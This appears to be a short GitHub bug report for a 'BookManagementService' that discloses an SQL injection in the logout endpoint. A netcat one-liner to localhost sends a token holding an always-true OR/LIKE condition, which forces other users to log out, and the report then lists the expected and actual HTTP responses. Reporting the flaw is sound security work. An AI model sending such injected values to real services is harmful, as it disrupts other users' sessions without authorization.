Open STommydx opened 4 years ago
Description Force others to logout with SQL injection
To reproduce
echo -e 'GET /BookManagementService/logout?token=y"\tOR\t""\tLIKE\t" HTTP/1.1 \r\n' | nc localhost 8080
Expected 409 Conflict
409 Conflict
What actually happened 200 OK
200 OK
Description Force others to logout with SQL injection
To reproduce
Expected
409 Conflict
What actually happened
200 OK